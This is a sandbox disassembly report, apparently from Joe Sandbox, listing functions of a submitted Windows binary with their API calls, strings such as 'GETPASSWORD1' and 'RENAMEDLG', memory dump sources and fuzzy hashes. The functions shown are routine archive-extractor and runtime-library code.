                                                                                              • Instruction ID: 03d91aa5da336f49223846ef97ce4454a4fd03cc59dfefffd7ddbd50d59960b5
                                                                                              • Opcode Fuzzy Hash: 6e41e2fb8c0ad96825405fb688585f4b31f02cdba35d780156b2ca9779e405df
                                                                                              • Instruction Fuzzy Hash: 30218E72540258AEEB21EFE8DE42FEE3BF8BF05740F040522FA1196191E371D6948B91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A32166 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00A2C04A,00000008,?,00000000,?,00A2E685,?,00000000), ref: 00A321A5
                                                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00A2C04A,00000008,?,00000000,?,00A2E685,?,00000000), ref: 00A321AF
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00A2C04A,00000008,?,00000000,?,00A2E685,?,00000000), ref: 00A321BF
                                                                                              Strings
                                                                                              • Thread pool initialization failed., xrefs: 00A321D7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                              • String ID: Thread pool initialization failed.
                                                                                              • API String ID: 3340455307-2182114853
                                                                                              • Opcode ID: e65c48a53a94aecbe53ce81930975879090b6e15ed01feaefd8fb19f8cf3630e
                                                                                              • Instruction ID: 3e9ffbde6adf941a57f0a30bf39045c62dac90a5eab90003349e24fec96c4740
                                                                                              • Opcode Fuzzy Hash: e65c48a53a94aecbe53ce81930975879090b6e15ed01feaefd8fb19f8cf3630e
                                                                                              • Instruction Fuzzy Hash: F111C6B1604709AFC3215F7ADD84AA7FBECFB59354F60492EF2D6C3200D67159818B60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3C460 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A212F6: GetDlgItem.USER32(00000000,00003021), ref: 00A2133A
                                                                                                • Part of subcall function 00A212F6: SetWindowTextW.USER32(00000000,00A545F4), ref: 00A21350
                                                                                              • EndDialog.USER32(?,00000001), ref: 00A3C4AE
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000200), ref: 00A3C4C6
                                                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 00A3C4F4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: GETPASSWORD1
                                                                                              • API String ID: 445417207-3292211884
                                                                                              • Opcode ID: c87cc6b12677dec5ae705d20fe963cb874a2d7305fdce4776c4969c85ecb3f59
                                                                                              • Instruction ID: 3547d71550129c6e2684165e004fb37b6fdb5e375f10b7c1db2ffc0706c36367
                                                                                              • Opcode Fuzzy Hash: c87cc6b12677dec5ae705d20fe963cb874a2d7305fdce4776c4969c85ecb3f59
                                                                                              • Instruction Fuzzy Hash: B0119676A001187ADB209F789D5DFFB377CEB45B24F000521FB05F6080C6759D4697A5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3EE2D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                              • API String ID: 0-56093855
                                                                                              • Opcode ID: 190f55dc05c949bdced7cfb625d1fb625cce01cb6ea1ab7bee323536747d3015
                                                                                              • Instruction ID: acc84783470a1ae354748df02e19446c678fc7e4709df4c68fab32b1d68ebe1d
                                                                                              • Opcode Fuzzy Hash: 190f55dc05c949bdced7cfb625d1fb625cce01cb6ea1ab7bee323536747d3015
                                                                                              • Instruction Fuzzy Hash: C2017172A04245BFDB11CFA9EC48A577BB4BB05394F204425F905932F0D6B19C56DBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A24957 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 00A2495C
                                                                                                • Part of subcall function 00A3FD1D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A3FD29
                                                                                                • Part of subcall function 00A3FD1D: ___delayLoadHelper2@8.DELAYIMP ref: 00A3FD4F
                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 00A24967
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
                                                                                              • String ID: string too long$vector too long
                                                                                              • API String ID: 2355824318-1617939282
                                                                                              • Opcode ID: b2280da6ded8260766d06e0358cf72ff6a408d221ad8ed77537b15969e674df3
                                                                                              • Instruction ID: bd9e6242040251bbdb4a75d2c117f845da3484e407b5ca9ae7ec1a9a49efa22e
                                                                                              • Opcode Fuzzy Hash: b2280da6ded8260766d06e0358cf72ff6a408d221ad8ed77537b15969e674df3
                                                                                              • Instruction Fuzzy Hash: EDF082312003146B4624AF5DFC4584BB3E9FF89B557100926FA4583606D7B0A9848AB1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4ABDA Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: __alldvrm$_strrchr
                                                                                              • String ID:
                                                                                              • API String ID: 1036877536-0
                                                                                              • Opcode ID: afb2700922330d6a2a5e5337cc0ba606ce23cf73aa61dbbfb2679083630104d7
                                                                                              • Instruction ID: 365ff23fec7c9aa855162b348f047adf52b1e768aa011a5cea3adb3641f088ea
                                                                                              • Opcode Fuzzy Hash: afb2700922330d6a2a5e5337cc0ba606ce23cf73aa61dbbfb2679083630104d7
                                                                                              • Instruction Fuzzy Hash: D4A17B7AE803969FDB12CF58C8927AEBBE4EFB5310F18416DE4959B282C2348D41C752
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2B74D Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00A28D5C,?,?,?), ref: 00A2B7F3
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000800,?,00A28D5C,?,?), ref: 00A2B837
                                                                                              • SetFileTime.KERNEL32(?,00A28AEC,?,00000000,?,00000800,?,00A28D5C,?,?,?,?,?,?,?,?), ref: 00A2B8B8
                                                                                              • CloseHandle.KERNEL32(?,?,00000800,?,00A28D5C,?,?,?,?,?,?,?,?,?,?), ref: 00A2B8BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Create$CloseHandleTime
                                                                                              • String ID:
                                                                                              • API String ID: 2287278272-0
                                                                                              • Opcode ID: a75b5d23b5b1220dcac6375ebe401860620c951cb546f86e7d202970fb456df5
                                                                                              • Instruction ID: 3e4cb83e413dbe7611a353a304b36d7fad273fe7fee6f32f51cbd89b066ae020
                                                                                              • Opcode Fuzzy Hash: a75b5d23b5b1220dcac6375ebe401860620c951cb546f86e7d202970fb456df5
                                                                                              • Instruction Fuzzy Hash: 5441F030258391ABE720DF28EC41BAABBE8AF84300F04092DF5D5931D1D764DA48DB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A210E0 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 176396367-0
                                                                                              • Opcode ID: 1f938b17b26009208316ebd7a0833009d1feb3cd1cd9a70fcd48cb22717c07f8
                                                                                              • Instruction ID: 68853dd0dfba67e7d886112e75808021b995f1b7f9f5d33039ade15508fbf908
                                                                                              • Opcode Fuzzy Hash: 1f938b17b26009208316ebd7a0833009d1feb3cd1cd9a70fcd48cb22717c07f8
                                                                                              • Instruction Fuzzy Hash: B341BF71E006299BCB11DFB89D49AEEBBB8EF54310F000129FD05F7245DA74AD498BE0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2851F Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00A28532
                                                                                              • _wcslen.LIBCMT ref: 00A28558
                                                                                              • _wcslen.LIBCMT ref: 00A285EF
                                                                                              • _wcslen.LIBCMT ref: 00A28657
                                                                                                • Part of subcall function 00A2B966: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00A2B991
                                                                                                • Part of subcall function 00A2B41F: RemoveDirectoryW.KERNEL32(?,?,?,00A28649,?), ref: 00A2B430
                                                                                                • Part of subcall function 00A2B41F: RemoveDirectoryW.KERNEL32(?,?,?,00000800,?,00A28649,?), ref: 00A2B45E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$DirectoryRemove$CloseFind
                                                                                              • String ID:
                                                                                              • API String ID: 973666142-0
                                                                                              • Opcode ID: 13c4833921830cc24cf7045191f17a435417e1473527d55b164f376317025a4e
                                                                                              • Instruction ID: e7bd31c0beac669eae255d12598a0c1a053422ee1513b0deb73defc076edce9e
                                                                                              • Opcode Fuzzy Hash: 13c4833921830cc24cf7045191f17a435417e1473527d55b164f376317025a4e
                                                                                              • Instruction Fuzzy Hash: 0931C6718012749ACF21AF68AD41BEE3365AF54780F044475F945A714AEF78DEC5CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4DB48 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00A4A871,?,00000000,?,00000001,?,?,00000001,00A4A871,?), ref: 00A4DB95
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A4DC1E
                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00A480B1,?), ref: 00A4DC30
                                                                                              • __freea.LIBCMT ref: 00A4DC39
                                                                                                • Part of subcall function 00A4A7FE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A4DBEC,00000000,?,00A480B1,?,00000008,?,00A4A871,?,?,?), ref: 00A4A830
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                              • String ID:
                                                                                              • API String ID: 2652629310-0
                                                                                              • Opcode ID: ed2b74cf77a7ef34ebffb174128143845ce66b9fd26aee5432157da952b79578
                                                                                              • Instruction ID: a54e03c2179b12abbabe6f492f020ad256207972e4d47919e598254f6c5c462b
                                                                                              • Opcode Fuzzy Hash: ed2b74cf77a7ef34ebffb174128143845ce66b9fd26aee5432157da952b79578
                                                                                              • Instruction Fuzzy Hash: F1319A76A0020AABDF25DFB4CC81EAF7BA5EF84310B154268FC04D6250EB35DD91CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A28704 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000020,?), ref: 00A28713
                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00A2871A
                                                                                              • GetLastError.KERNEL32 ref: 00A28759
                                                                                              • CloseHandle.KERNEL32(?), ref: 00A28768
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CloseCurrentErrorHandleLastOpenToken
                                                                                              • String ID:
                                                                                              • API String ID: 2767541406-0
                                                                                              • Opcode ID: 5f2a74363dfde3fe75854e594d138af102bfecb3518bfdd646f54842e84b6d69
                                                                                              • Instruction ID: 0d203ce95dc8639c6bcad5c2aa78a7e47bb57f77e00af24bc7d495ea8670a9bb
                                                                                              • Opcode Fuzzy Hash: 5f2a74363dfde3fe75854e594d138af102bfecb3518bfdd646f54842e84b6d69
                                                                                              • Instruction Fuzzy Hash: BB01FBB5900219AFEB10DFE4AD89AAE7B7CBB04745F604025BA02A1150EB34CE45AA71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3B673 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 00A3B676
                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00A3B685
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A3B693
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00A3B6A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDevice$Release
                                                                                              • String ID:
                                                                                              • API String ID: 1035833867-0
                                                                                              • Opcode ID: ce025e75fbb121ca7120c14185b345d0353e904e46aba546a4b532fb8c00abad
                                                                                              • Instruction ID: bc1801adc91a965ad591658514613c28ef62e532ae64c35c073d08fd53c0198a
                                                                                              • Opcode Fuzzy Hash: ce025e75fbb121ca7120c14185b345d0353e904e46aba546a4b532fb8c00abad
                                                                                              • Instruction Fuzzy Hash: 79E0EC31D95F60ABD720ABF0AC1DB9A3FA4AF15712F040115FB01A6190CBB044028FE1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3B81C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A3B6A9: GetDC.USER32(00000000), ref: 00A3B6AD
                                                                                                • Part of subcall function 00A3B6A9: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A3B6B8
                                                                                                • Part of subcall function 00A3B6A9: ReleaseDC.USER32(00000000,00000000), ref: 00A3B6C3
                                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00A3B84C
                                                                                                • Part of subcall function 00A3BADE: GetDC.USER32(00000000), ref: 00A3BAE7
                                                                                                • Part of subcall function 00A3BADE: GetObjectW.GDI32(?,00000018,?), ref: 00A3BB16
                                                                                                • Part of subcall function 00A3BADE: ReleaseDC.USER32(00000000,?), ref: 00A3BBAE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ObjectRelease$CapsDevice
                                                                                              • String ID: (
                                                                                              • API String ID: 1061551593-3887548279
                                                                                              • Opcode ID: c6356c64067941720374ac4f9a177b27bc4b54c1dad6322b0797a30a6abce4f2
                                                                                              • Instruction ID: f860975bcacd02e27bc529ea718f95472a951108e8d3085bde5f6da528070a57
                                                                                              • Opcode Fuzzy Hash: c6356c64067941720374ac4f9a177b27bc4b54c1dad6322b0797a30a6abce4f2
                                                                                              • Instruction Fuzzy Hash: AA91E0B1608754AFD610DF65C844A6BBBF9FFC9705F00491EF99AD3260DB30A846CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A280BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00A280C3
                                                                                                • Part of subcall function 00A31907: _wcslen.LIBCMT ref: 00A3190D
                                                                                                • Part of subcall function 00A2B966: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00A2B991
                                                                                              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A28262
                                                                                                • Part of subcall function 00A2B8E6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00A2B5B5,?,?,?,00A2B405,?,00000001,00000000,?,?), ref: 00A2B8FA
                                                                                                • Part of subcall function 00A2B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00A2B5B5,?,?,?,00A2B405,?,00000001,00000000,?,?), ref: 00A2B92B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                              • String ID: :
                                                                                              • API String ID: 3226429890-336475711
                                                                                              • Opcode ID: 847c07a0c8c64f2e133daf31a886c5791a75cbcf6b6da047f25588c6d77ec748
                                                                                              • Instruction ID: 6c981e3bb28ee374d053a98afb429388cd417330d3d639f3d8a4aee72762153d
                                                                                              • Opcode Fuzzy Hash: 847c07a0c8c64f2e133daf31a886c5791a75cbcf6b6da047f25588c6d77ec748
                                                                                              • Instruction Fuzzy Hash: 53518471800278AAEB25EB54DD56EEE737DAF55300F0041B5F609A2082DB785F89CF61
